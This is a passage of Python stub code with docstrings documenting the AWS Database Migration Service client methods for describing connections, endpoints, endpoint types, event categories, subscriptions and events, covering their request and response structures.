- **ValidFromDate** *(datetime) --*
The beginning date that the certificate is valid.
- **ValidToDate** *(datetime) --*
The final date that the certificate is valid.
- **SigningAlgorithm** *(string) --*
The signing algorithm for the certificate.
- **KeyLength** *(integer) --*
The key length of the cryptographic algorithm being used.
:type Filters: list
:param Filters:
Filters applied to the certificate described in the form of key-value pairs.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 10
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_connections(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Describes the status of the connections that have been made between the replication instance and an endpoint. Connections are created when you test an endpoint.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeConnections>`_
**Request Syntax**
::
response = client.describe_connections(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'Connections': [
{
'ReplicationInstanceArn': 'string',
'EndpointArn': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'EndpointIdentifier': 'string',
'ReplicationInstanceIdentifier': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **Connections** *(list) --*
A description of the connections.
- *(dict) --*
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **Status** *(string) --*
The connection status.
- **LastFailureMessage** *(string) --*
The error message when the connection last failed.
- **EndpointIdentifier** *(string) --*
The identifier of the endpoint. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
:type Filters: list
:param Filters:
The filters applied to the connection.
Valid filter names: endpoint-arn | replication-instance-arn
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_endpoint_types(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the type of endpoints available.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeEndpointTypes>`_
**Request Syntax**
::
response = client.describe_endpoint_types(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'SupportedEndpointTypes': [
{
'EngineName': 'string',
'SupportsCDC': True|False,
'EndpointType': 'source'|'target',
'EngineDisplayName': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **SupportedEndpointTypes** *(list) --*
The type of endpoints that are supported.
- *(dict) --*
- **EngineName** *(string) --*
The database engine name. Valid values, depending on the EndPointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, sybase, dynamodb, mongodb, and sqlserver.
- **SupportsCDC** *(boolean) --*
Indicates if Change Data Capture (CDC) is supported.
- **EndpointType** *(string) --*
The type of endpoint.
- **EngineDisplayName** *(string) --*
The expanded name for the engine name. For example, if the ``EngineName`` parameter is "aurora," this value would be "Amazon Aurora MySQL."
:type Filters: list
:param Filters:
Filters applied to the describe action.
Valid filter names: engine-name | endpoint-type
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_endpoints(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the endpoints for your account in the current region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeEndpoints>`_
**Request Syntax**
::
response = client.describe_endpoints(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'Endpoints': [
{
'EndpointIdentifier': 'string',
'EndpointType': 'source'|'target',
'EngineName': 'string',
'EngineDisplayName': 'string',
'Username': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'ExtraConnectionAttributes': 'string',
'Status': 'string',
'KmsKeyId': 'string',
'EndpointArn': 'string',
'CertificateArn': 'string',
'SslMode': 'none'|'require'|'verify-ca'|'verify-full',
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'ExternalId': 'string',
'DynamoDbSettings': {
'ServiceAccessRoleArn': 'string'
},
'S3Settings': {
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
'DmsTransferSettings': {
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
'MongoDbSettings': {
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
'KinesisSettings': {
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
'ElasticsearchSettings': {
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
'RedshiftSettings': {
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **Endpoints** *(list) --*
Endpoint description.
- *(dict) --*
- **EndpointIdentifier** *(string) --*
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **EndpointType** *(string) --*
The type of endpoint.
- **EngineName** *(string) --*
The database engine name. Valid values, depending on the EndPointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, sybase, dynamodb, mongodb, and sqlserver.
- **EngineDisplayName** *(string) --*
The expanded name for the engine name. For example, if the ``EngineName`` parameter is "aurora," this value would be "Amazon Aurora MySQL."
- **Username** *(string) --*
The user name used to connect to the endpoint.
- **ServerName** *(string) --*
The name of the server at the endpoint.
- **Port** *(integer) --*
The port value used to access the endpoint.
- **DatabaseName** *(string) --*
The name of the database at the endpoint.
- **ExtraConnectionAttributes** *(string) --*
Additional connection attributes used to connect to the endpoint.
- **Status** *(string) --*
The status of the endpoint.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) used for SSL connection to the endpoint.
- **SslMode** *(string) --*
The SSL mode used to connect to the endpoint.
SSL mode can be one of four values: none, require, verify-ca, verify-full.
The default value is none.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **ExternalId** *(string) --*
Value returned by a call to CreateEndpoint that can be used for cross-account validation. Use it on a subsequent call to CreateEndpoint to create the endpoint with a cross-account.
- **DynamoDbSettings** *(dict) --*
The settings for the target DynamoDB database. For more information, see the ``DynamoDBSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **S3Settings** *(dict) --*
The settings for the S3 target endpoint. For more information, see the ``S3Settings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a carriage return (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``"arn:aws:s3:::dms-*"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads. But as the number of row groups grows, the slower writes become. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the max row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
- **DmsTransferSettings** *(dict) --*
The settings in JSON format for the DMS transfer type of source endpoint.
Possible attributes include the following:
* ``serviceAccessRoleArn`` - The IAM role that has permission to access the Amazon S3 bucket.
* ``bucketName`` - The name of the S3 bucket to use.
* ``compressionType`` - An optional parameter to use GZIP to compress the target files. To use GZIP, set this value to ``NONE`` (the default). To keep the files uncompressed, don't use this value.
Shorthand syntax for these attributes is as follows: ``ServiceAccessRoleArn=string,BucketName=string,CompressionType=string``
JSON syntax for these attributes is as follows: ``{ "ServiceAccessRoleArn": "string", "BucketName": "string", "CompressionType": "none"|"gzip" }``
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
- **MongoDbSettings** *(dict) --*
The settings for the MongoDB source endpoint. For more information, see the ``MongoDbSettings`` structure.
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when authType=No.
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **KinesisSettings** *(dict) --*
The settings for the Amazon Kinesis source endpoint. For more information, see the ``KinesisSettings`` structure.
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
- **ElasticsearchSettings** *(dict) --*
The settings for the Elasticsearch source endpoint. For more information, see the ``ElasticsearchSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by service to access the IAM role.
- **EndpointUri** *(string) --*
The endpoint for the ElasticSearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
- **RedshiftSettings** *(dict) --*
Settings for the Amazon Redshift endpoint
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of 'YYYY-MM-DD'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``"arn:aws:s3:::*"`` to use the following actions: ``"s3:PutObject", "s3:ListBucket"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of chars you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is "?".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), 'timeformat_string', 'epochsecs', or 'epochmillisecs'. It defaults to 10. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:type Filters: list
:param Filters:
Filters applied to the describe action.
Valid filter names: endpoint-arn | endpoint-type | endpoint-id | engine-name
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_event_categories(self, SourceType: str = None, Filters: List = None) -> Dict:
"""
Lists categories for all event source types, or, if specified, for a specified source type. You can see a list of the event categories and source types in `Working with Events and Notifications <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Events.html>`__ in the *AWS Database Migration Service User Guide.*
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeEventCategories>`_
**Request Syntax**
::
response = client.describe_event_categories(
SourceType='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
**Response Syntax**
::
{
'EventCategoryGroupList': [
{
'SourceType': 'string',
'EventCategories': [
'string',
]
},
]
}
**Response Structure**
- *(dict) --*
- **EventCategoryGroupList** *(list) --*
A list of event categories.
- *(dict) --*
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | replication-server | security-group | migration-task
- **EventCategories** *(list) --*
A list of event categories for a ``SourceType`` that you want to subscribe to.
- *(string) --*
:type SourceType: string
:param SourceType:
The type of AWS DMS resource that generates events.
Valid values: replication-instance | migration-task
:type Filters: list
:param Filters:
Filters applied to the action.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def describe_event_subscriptions(self, SubscriptionName: str = None, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Lists all the event subscriptions for a customer account. The description of a subscription includes ``SubscriptionName`` , ``SNSTopicARN`` , ``CustomerID`` , ``SourceType`` , ``SourceID`` , ``CreationTime`` , and ``Status`` .
If you specify ``SubscriptionName`` , this action lists the description for that subscription.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeEventSubscriptions>`_
**Request Syntax**
::
response = client.describe_event_subscriptions(
SubscriptionName='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'EventSubscriptionsList': [
{
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **EventSubscriptionsList** *(list) --*
A list of event subscriptions.
- *(dict) --*
- **CustomerAwsId** *(string) --*
The AWS customer account associated with the AWS DMS event notification subscription.
- **CustSubscriptionId** *(string) --*
The AWS DMS event notification subscription Id.
- **SnsTopicArn** *(string) --*
The topic ARN of the AWS DMS event notification subscription.
- **Status** *(string) --*
The status of the AWS DMS event notification subscription.
Constraints:
Can be one of the following: creating | modifying | deleting | active | no-permission | topic-not-exist
The status "no-permission" indicates that AWS DMS no longer has permission to post to the SNS topic. The status "topic-not-exist" indicates that the topic was deleted after the subscription was created.
- **SubscriptionCreationTime** *(string) --*
The time the RDS event notification subscription was created.
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | replication-server | security-group | migration-task
- **SourceIdsList** *(list) --*
A list of source Ids for the event subscription.
- *(string) --*
- **EventCategoriesList** *(list) --*
A lists of event categories.
- *(string) --*
- **Enabled** *(boolean) --*
Boolean value that indicates if the event subscription is enabled.
:type SubscriptionName: string
:param SubscriptionName:
The name of the AWS DMS event subscription to be described.
:type Filters: list
:param Filters:
Filters applied to the action.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_events(self, SourceIdentifier: str = None, SourceType: str = None, StartTime: datetime = None, EndTime: datetime = None, Duration: int = None, EventCategories: List = None, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Lists events for a given source identifier and source type. You can also specify a start and end time. For more information on AWS DMS events, see `Working with Events and Notifications <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Events.html>`__ in the *AWS Database Migration User Guide.*
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeEvents>`_
**Request Syntax**
::
response = client.describe_events(
SourceIdentifier='string',
SourceType='replication-instance',
StartTime=datetime(2015, 1, 1),
EndTime=datetime(2015, 1, 1),
Duration=123,
EventCategories=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'Events': [
{
'SourceIdentifier': 'string',
'SourceType': 'replication-instance',
'Message': 'string',
'EventCategories': [
'string',
],
'Date': datetime(2015, 1, 1)
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **Events** *(list) --*
The events described.
- *(dict) --*
- **SourceIdentifier** *(string) --*
The identifier of the event source. An identifier must begin with a letter and must contain only ASCII letters, digits, and hyphens; it cannot end with a hyphen or contain two consecutive hyphens.
Constraints:replication instance, endpoint, migration task
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | endpoint | migration-task
- **Message** *(string) --*
The event message.
- **EventCategories** *(list) --*
The event categories available for the specified source type.
- *(string) --*
- **Date** *(datetime) --*
The date of the event.
:type SourceIdentifier: string
:param SourceIdentifier:
The identifier of the event source. An identifier must begin with a letter and must contain only ASCII letters, digits, and hyphens. It cannot end with a hyphen or contain two consecutive hyphens.
:type SourceType: string
:param SourceType:
The type of AWS DMS resource that generates events.
Valid values: replication-instance | migration-task
:type StartTime: datetime
:param StartTime:
The start time for the events to be listed.
:type EndTime: datetime
:param EndTime:
The end time for the events to be listed.
:type Duration: integer
:param Duration:
The duration of the events to be listed.
:type EventCategories: list
:param EventCategories:
A list of event categories for a source type that you want to subscribe to.
- *(string) --*
:type Filters: list
:param Filters:
Filters applied to the action.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_orderable_replication_instances(self, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the replication instance types that can be created in the specified region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeOrderableReplicationInstances>`_
**Request Syntax**
::
response = client.describe_orderable_replication_instances(
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'OrderableReplicationInstances': [
{
'EngineVersion': 'string',
'ReplicationInstanceClass': 'string',
'StorageType': 'string',
'MinAllocatedStorage': 123,
'MaxAllocatedStorage': 123,
'DefaultAllocatedStorage': 123,
